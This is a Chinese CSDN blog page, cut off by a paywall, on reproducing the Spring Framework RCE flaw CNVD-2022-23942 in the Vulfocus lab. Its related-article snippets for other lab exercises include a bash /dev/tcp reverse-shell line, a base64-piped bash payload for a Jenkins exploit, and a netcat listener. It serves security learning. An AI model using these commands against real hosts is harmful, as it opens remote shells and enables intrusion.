Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)

已于 2022-05-16 14:21:56 修改
阅读量1.7k 收藏 5
点赞数 3
分类专栏: 漏洞复现 文章标签: java spring 开发语言
于 2022-05-16 13:39:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aquarius_ego/article/details/124794818
版权
本文详细介绍了Spring框架的远程命令执行漏洞,该漏洞可能导致后门文件写入和配置修改,影响使用JDK9及以上版本的Spring MVC应用。通过分析漏洞描述、影响范围和复现步骤,展示了如何构造payload,写入webshell,并验证漏洞利用成功。
摘要由CSDN通过智能技术生成

漏洞情况分析:

Spring框架(Framework)是一个开源的轻量级J2EE应用程序开发框架,提供了IOC、AOP及MVC等功能,解决了程序人员在开发中遇到的常见问题,提高了应用程序开发便捷度和软件系统构建效率。

2022年3月30日,CNVD平台接收到蚂蚁科技集团股份有限公司报送的Spring框架远程命令执行漏洞。由于Spring框架存在处理流程缺陷,攻击者可在远程条件下,实现对目标主机的后门文件写入和配置修改,继而通过后门文件访问获得目标主机权限。使用Spring框架或衍生框架构建网站等应用,且同时使用JDK版本在9及以上版本的,易受此漏洞攻击影响。

CNVD对该漏洞的综合评级为“高危”。

漏洞描述:

作为目前全球最受欢迎的Java轻量级开源框架,Spring允许开发人员专注于业务逻辑,简化Java企业级应用的开发周期。

但在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并 写入任意路径下的文件。

目前已知,触发该漏洞需要满足两个基本条件:

  • 使用JDK9及以上版本的Spring MVC框架
  • Spring 框架以及衍生的框架spring-beans-*.jar 文件或者存在CachedIntrospectionResults.class

漏洞影响范围:

JD

最低0.47元/天 解锁文章
Aquarius_ego
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ThinkPHP Lang文件包含To远程代码执行漏洞复现CNVD-2022-86535
afei001
12-14 1202
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。ThinkPHP存在命令执行漏洞,该漏洞是由于开启了多语言功能,对参数lang传参过滤不严谨,攻击者可利用该漏洞执行命令。本质是ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,ThinkPHP LoadLangPack中存在目录穿越漏洞,然后再利用pearcmd文件包含并结合它的指令config-create创建恶意代码,从而实现远程代码执行
spring framework远程代码执行漏洞复现CNVD-2022-23942 CVE-2022-22965)
yang1234567898的博客
04-18 7064
3 月 30 日,国家信息安全漏洞共享平台(CNVD)接收到蚂蚁科技集团股份有限公司报送的 Spring 框架远程命令执行漏洞CNVD-2022-23942)。攻击者利用该漏洞,可在未授权的情况下远程执行命令CNVD 对该漏洞的综合评级为“高危”。 漏洞影响: JDK9+ 使用了 Spring 框架或衍生框架 Apache Tomcat 作为 Servlet 容器 spring-webmvc 或 spring-webflux 依赖 Spring Framework 版本 5.3.0..
Spring框架远程命令执行漏洞CNVD-2022-23942
axiom2020的博客
05-03 1861
Spring框架远程命令执行漏洞CNVD-2022-23942
漏洞复现】某凌OA 文件Copy导致远程代码执行
最新发布
weixin_54799594的博客
07-25 2602
漏洞复现笔记
vulfocus复现Spring Framework 远程命令执行漏洞
woai_zhongguo的博客
07-18 1090
vulfocus复现Spring Framework 远程命令执行漏洞
(CVE-2022-22965)Spring Framework 远程命令执行漏洞(vulfocus复现)
qq_40646572的博客
05-11 887
漏洞SpringFramework数据绑定的一个漏洞,如果后台方法中接受的参数为非基础类型,Spring会根据前端传入的请求正文中的参数的key值来查询与其名称所对应的getter和setter方法,攻击者利用这一特性修改了Tomcat的一个用于日志记录的类的属性,进而当Tomcat在进行写日志操作的时候,将攻击者传递的恶意代码写入指定目录的指定文件中。
Spring Framework远程代码执行漏洞
m0_71745903的博客
01-11 719
2022年3月30日,国家信息安全漏洞共享平台(CNVD)发布了Spring框架远程命令执行漏洞(攻击者利用该漏洞,可在未授权的情况下远程执行命令。目前,此漏洞POC、技术细节及EXP已大范围公开,此漏洞影响范围极大。目前Spring官方已发布补丁修复该漏洞,强烈建议Spring框架用户立即更新至最新版本。
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
vulfocus Apache log4j2-RCE 漏洞复现CVE-2021-44228)
qq_45780190的博客
12-15 5235
根据提示,漏洞存在于http://xxxxx/hello的payload参数中,并以post的方式传参,因此我们可以利用hackerbar进行漏洞验证 创建靶场后是这样一个页面。 使用payload验证,发现可以触发dnslog,可以确认可以利用 证明存在JNDI注入漏洞。 在这里我们需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload,建立1389和8080端口的服务。用于远程命令执行使靶机来访问我准备好的EXP从而进行更安全的被动连接,
vulfocus靶场jenkins代码执行漏洞cve-1027-1000353
没有故事
04-23 363
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,上一步生成的base64编码}|{base64,-d}|{bash,-i}"python3 exploit.py http://受害者IP:端口 jenkins_poc.ser。bash -i >& /dev/tcp/监听机的IP/端口 0>&1。攻击机监听: nc -lvp 4444。GitCode - 开发者的代码家园。
[漏洞复现]vulfocus/jenkins-cve_2017_1000353
qq_45751902的博客
11-24 561
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限建议自己搭建环境复现,这个vulfocus上没有体现出反序列化漏洞,因为无法使用反序列化查看flag,最终使用弱口令登录,执行系统命令成功找到flag。
vulfocus漏洞复现】scrapyd 未授权访问漏洞
一剑开天门!的博客
03-14 7101
vulfocus漏洞复现】scrapyd 未授权访问漏洞
2022年12月最新)最详细vulfocus靶场 Log4j2远程命令执行漏洞复现
qq1140037586的博客
12-15 1123
1、向目标发送指定payload,目标对payload进行解析执行,然后会通过ldap链接远程服务,当ldap服务收到请求之后,将请求进行重定向到恶意 java class的地址。 2、目标服务器收到重定向请求之后,下载恶意class并执行其中的代码,从而执行系统命令
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 5947
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场,靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
vulfocus复现spring 命令执行 (CVE-2022-22947)
woai_zhongguo的博客
07-18 3918
vulfocus复现spring 命令执行 (CVE-2022-22947)
[Vulfocus解题系列]Apache Solr 远程命令执行漏洞(CVE-2019-0193)
00勇士王子的博客
01-06 927
介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。 靶场搭建 进入指定漏洞路径,执行命令 docker-c
vulfocus——discuz命令执行(wooyun-2010-080723)
m0_62063669的博客
09-15 1362
如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。2.找到一个帖子,然后用burp suite抓包。
vulfocus thinkphp 代码执行 (CNVD-2018-24942)
03-29
ThinkPHP是一款快速、简单的PHP开发框架,该框架在处理某些特定情况下的输入时存在代码执行漏洞。攻击者可以通过构造恶意的输入数据,利用该漏洞执行任意代码,从而控制服务器。 漏洞影响: ThinkPHP 5.0.x - ...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值